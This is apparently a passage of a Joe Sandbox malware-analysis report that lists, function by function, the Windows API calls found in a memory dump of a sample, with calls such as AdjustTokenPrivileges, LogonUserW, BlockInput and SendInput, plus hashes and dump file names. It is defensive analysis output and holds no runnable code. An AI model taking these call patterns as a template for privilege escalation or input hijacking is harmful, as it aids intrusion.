                                                • Opcode ID: cc36a36205b0b3b8c91b63da5b637a4a3b593ee9407f3b8b0398e5a1db21e55a
                                                • Instruction ID: ae19e610c791a9f7c9e174b3fb6bf2e1ea1051d061d4428033279f3ac5b496b1
                                                • Opcode Fuzzy Hash: cc36a36205b0b3b8c91b63da5b637a4a3b593ee9407f3b8b0398e5a1db21e55a
                                                • Instruction Fuzzy Hash: 2341B071A0420DBFEB209BD4CD81EBBB7BCEB44764F10402EF709A6181EA719E4197A0
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00AEE20D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AEE267
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00AEE2B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 5703141b51f7d23b0f5154a22b837ea3b176da7aeeedf2d5c04ccb86c0f397e1
                                                • Instruction ID: 625eea109124fe1ff00bc00ee246d860b296cebf4d15d89582d74d6efbea6c86
                                                • Opcode Fuzzy Hash: 5703141b51f7d23b0f5154a22b837ea3b176da7aeeedf2d5c04ccb86c0f397e1
                                                • Instruction Fuzzy Hash: E1213035A00218EFDB00DFA5D985AEDFBB8FF49310F1484A9E905A7351DB319915CB50
                                                APIs
                                                  • Part of subcall function 00ABF4EA: std::exception::exception.LIBCMT ref: 00ABF51E
                                                  • Part of subcall function 00ABF4EA: __CxxThrowException@8.LIBCMT ref: 00ABF533
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ADB180
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ADB1AD
                                                • GetLastError.KERNEL32 ref: 00ADB1BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: b8a1986a2a5dae36c676642d12a8bfd0adaa92e46d6a6477b2f67bfd15bf0287
                                                • Instruction ID: 9d5a71a53277360665dbe31cc7e6a7850e53368337ac0b780a150e0df9e7da78
                                                • Opcode Fuzzy Hash: b8a1986a2a5dae36c676642d12a8bfd0adaa92e46d6a6477b2f67bfd15bf0287
                                                • Instruction Fuzzy Hash: 7811CAB2410204EFE728AF64DCC6D6BB7BCFB44310B21862EF05693251EB70FC428A64
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE66AF
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AE66EC
                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE66F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
                                                • Opcode ID: 86d95e70d314b3afbdad7b81f8b06b8ea60048cc543979e17883d6cb04ae4a39
                                                • Instruction ID: 681658d9bf4bf4e2edebd202f2d69da04ac8d4716fe1af882e2392d193859e4d
                                                • Opcode Fuzzy Hash: 86d95e70d314b3afbdad7b81f8b06b8ea60048cc543979e17883d6cb04ae4a39
                                                • Instruction Fuzzy Hash: FB11C4B1900228BFE7118BA9DC45FAFBBBCEB08754F004656F901F71D0C2B89E0587A5
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AE7223
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AE723A
                                                • FreeSid.ADVAPI32(?), ref: 00AE724A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: d276252cea9b398fc37f03014891cad6677f0cf6d57f5f7d1a1f5835adab6b20
                                                • Instruction ID: 37be0c17221c5fa16b29b2e23fb776b7f3f0209930f993769c2cf9e743b959cb
                                                • Opcode Fuzzy Hash: d276252cea9b398fc37f03014891cad6677f0cf6d57f5f7d1a1f5835adab6b20
                                                • Instruction Fuzzy Hash: 7BF01D76A04209BFDF04DFE4DD99AEEBBB8EF08201F104469A602E3191E6709A458B54
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AEF599
                                                • FindClose.KERNEL32(00000000), ref: 00AEF5C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: da3d8b8d3c221b5942d8025d6a8c7a220cde750afb77c15d405b49b7ba634d41
                                                • Instruction ID: f5aef49b3c9b7772da1ca4f6b75f6f6d9bccbd7143b9352f501ef69f62622792
                                                • Opcode Fuzzy Hash: da3d8b8d3c221b5942d8025d6a8c7a220cde750afb77c15d405b49b7ba634d41
                                                • Instruction Fuzzy Hash: 5D1180726006009FDB10EF29D845A6EF7E9FF95325F00891EF9A9DB291DF30AD018B91
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AFBE6A,?,?,00000000,?), ref: 00AECEA7
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AFBE6A,?,?,00000000,?), ref: 00AECEB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: af0afb57a8162d19655e8e1b14645cd1ada42c8170dad7c2ec72e1c505d64b6c
                                                • Instruction ID: 15b6ce64fe84ef90f07acc16e7cd6a7a55667d2aa2bccccebc11afd14966712d
                                                • Opcode Fuzzy Hash: af0afb57a8162d19655e8e1b14645cd1ada42c8170dad7c2ec72e1c505d64b6c
                                                • Instruction Fuzzy Hash: 38F08231100229EBEB309BA4DC49FEA776DBF09361F004165F915D7181D7309A41CBA0
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AE4153
                                                • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AE4166
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InputSendkeybd_event
                                                • String ID:
                                                • API String ID: 3536248340-0
                                                • Opcode ID: 3d5f08378ec96afca42db549c5295e0a29e13a11bfba3b85c6777d6e13832293
                                                • Instruction ID: fe19094171293050fc9f484588b04563b9ca51d655707e045a96b4a937d76f09
                                                • Opcode Fuzzy Hash: 3d5f08378ec96afca42db549c5295e0a29e13a11bfba3b85c6777d6e13832293
                                                • Instruction Fuzzy Hash: F5F0677080028DAFEF059FA1C805BBE7BB4EF14305F00800AF966A6192D7B986129FA0
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ADACC0), ref: 00ADAB99
                                                • CloseHandle.KERNEL32(?,?,00ADACC0), ref: 00ADABAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: 3bfa8e1dd90be797a7f0fa1cd0fd648d7ab8b74ad5344a9c3c60328efdbb555a
                                                • Instruction ID: 8e5e6c3ae20ca2ea3ca917cc9e8ca5240aa51e1915f19118d844258290f5d274
                                                • Opcode Fuzzy Hash: 3bfa8e1dd90be797a7f0fa1cd0fd648d7ab8b74ad5344a9c3c60328efdbb555a
                                                • Instruction Fuzzy Hash: 2FE0BF71000510AFE7352F54ED05DB777ADEB043217148929B45A81471DB725D919B54
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00AC6DB3,-0000031A,?,?,00000001), ref: 00AC81B1
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AC81BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: f70139db1896a2011a62b6ce9eae75f7f26d1544cf98891e7c3d5d3a16eec45f
                                                • Instruction ID: d68dc217ff6927e227f58bb154b452f015f9b3e973abbbaa7ef3a0811e2dccf5
                                                • Opcode Fuzzy Hash: f70139db1896a2011a62b6ce9eae75f7f26d1544cf98891e7c3d5d3a16eec45f
                                                • Instruction Fuzzy Hash: 81B09231144608ABEB106BA1EC09B587F68EB08652F104010F60D860618F7254128A9A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 086cfa9d729b6c516a61f2dae87a7644ba8284a2c603bdc71a1b0a1ffbc13a89
                                                • Instruction ID: e47cfbd66337fdd69e374a04ed80ccef27149be820522b8d19e9d498fcf6cadf
                                                • Opcode Fuzzy Hash: 086cfa9d729b6c516a61f2dae87a7644ba8284a2c603bdc71a1b0a1ffbc13a89
                                                • Instruction Fuzzy Hash: B2A24A74E04219DFCB24CF58C8806AEBBF1FF59314F2581AAD859AB391D7349E81DB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94b469a2289e2d6cd4c1ae2b203958265d0353e12afb18dbabd62780025de7d0
                                                • Instruction ID: 47c4fcf0a27d44fa6fffb0fae4343faa0037c8457860a602de6748de9d236dfd
                                                • Opcode Fuzzy Hash: 94b469a2289e2d6cd4c1ae2b203958265d0353e12afb18dbabd62780025de7d0
                                                • Instruction Fuzzy Hash: 7C32E331D29F014DD7239635D922339A298AFB73D4F26D73BE819B6DA5EF29C8834100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID:
                                                • API String ID: 674341424-0
                                                • Opcode ID: cb9bed121af2a82e2b877a286e1c8d02330f66a05288ead41120ed6a9e08f116
                                                • Instruction ID: f32633f65d7206eb833d19b3ca0a5cf4fd76e519085f722cd450feedc94b774c
                                                • Opcode Fuzzy Hash: cb9bed121af2a82e2b877a286e1c8d02330f66a05288ead41120ed6a9e08f116
                                                • Instruction Fuzzy Hash: 552299716083009FD724DF24C991BAFBBE8EF85350F10491EF89A9B291DB71E945CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddc92dcfd13d60ce11b5e121aebb900ee1495423d2f54de438170638c1bc790b
                                                • Instruction ID: 1347964d7a533c9f1d8624c1c834f84e5153fdf1186777e005994ad3f7c98796
                                                • Opcode Fuzzy Hash: ddc92dcfd13d60ce11b5e121aebb900ee1495423d2f54de438170638c1bc790b
                                                • Instruction Fuzzy Hash: 9EB1F420D2AF414DD3239639897133AB65CAFBB2D5FA1D71BFC5775D22EB2285834180
                                                APIs
                                                • __time64.LIBCMT ref: 00AEB6DF
                                                  • Part of subcall function 00AC344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00AEBDC3,00000000,?,?,?,?,00AEBF70,00000000,?), ref: 00AC3453
                                                  • Part of subcall function 00AC344A: __aulldiv.LIBCMT ref: 00AC3473
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID:
                                                • API String ID: 2893107130-0
                                                • Opcode ID: f32307941a8d1705b177f7b2eb109bbc9a1fd8cbd6cc9f28e6fb8fba2ddb0a6c
                                                • Instruction ID: 3fb6bc05905238ff05c348c33e3e3475a6e85dbdd57505132dc1e34919cc9eb8
                                                • Opcode Fuzzy Hash: f32307941a8d1705b177f7b2eb109bbc9a1fd8cbd6cc9f28e6fb8fba2ddb0a6c
                                                • Instruction Fuzzy Hash: D6218472634510CBC729CF39C491A52B7E1EB95711B248E7DE4E5CB2C0CB78BA05DB54
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 00AF6ACA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 9744d5a6fa411ee683901d16c3cdfe2b4515d1bcebbc9bc05028e60b97b25c38
                                                • Instruction ID: 4cf07a5666b11f5b2c99495ff17a38832135bfc7f3f421038c1e8d690a714d5d
                                                • Opcode Fuzzy Hash: 9744d5a6fa411ee683901d16c3cdfe2b4515d1bcebbc9bc05028e60b97b25c38
                                                • Instruction Fuzzy Hash: 33E048352002046FC740EF99D504EAAB7FCAF75751F04C456FA45D7291DAB0F8048B90
                                                APIs
                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AE74DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: c478a8e2bc3ed447a09e9e8e5802afd1588d5efb75486418cdd5f32fce24e6d1
                                                • Instruction ID: ab9d9e3e4874f9f180439736c271771fda78afcb4d64f405cfab8d90b9a02027
                                                • Opcode Fuzzy Hash: c478a8e2bc3ed447a09e9e8e5802afd1588d5efb75486418cdd5f32fce24e6d1
                                                • Instruction Fuzzy Hash: D4D09EA566C78579FD2987269C1FF7E1918F3007C1F949689B682CA4C1B8D058469132
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ADAD3E), ref: 00ADB124
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 4d679e318c110b9868db8cb824ec5d095bb7c5262a0a4c65dc5ee3d08529e317
                                                • Instruction ID: 50f33f1a4eb0ad5b80a95183b61eeac186d8dcc13e6cf397b5eefd7e962bc1b7
                                                • Opcode Fuzzy Hash: 4d679e318c110b9868db8cb824ec5d095bb7c5262a0a4c65dc5ee3d08529e317
                                                • Instruction Fuzzy Hash: 67D05E320A460EAEDF024FA4DC02EAF3F6AEB04700F408110FA11C60A0C671D532AB50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: 31f2e49d279bc0c822068e7b65b703f1e75d7204803e2e790918faf68853ac3b
                                                • Instruction ID: 7975c038bd39ed566b78d2ac6a9c2a5f8d9530c8bd584b78658b6337553e5c44
                                                • Opcode Fuzzy Hash: 31f2e49d279bc0c822068e7b65b703f1e75d7204803e2e790918faf68853ac3b
                                                • Instruction Fuzzy Hash: 58C04CB1401109DFC751CBC0CD849EFB7BCAB04301F1040919105F2110DB70AB859B72
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AC818F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
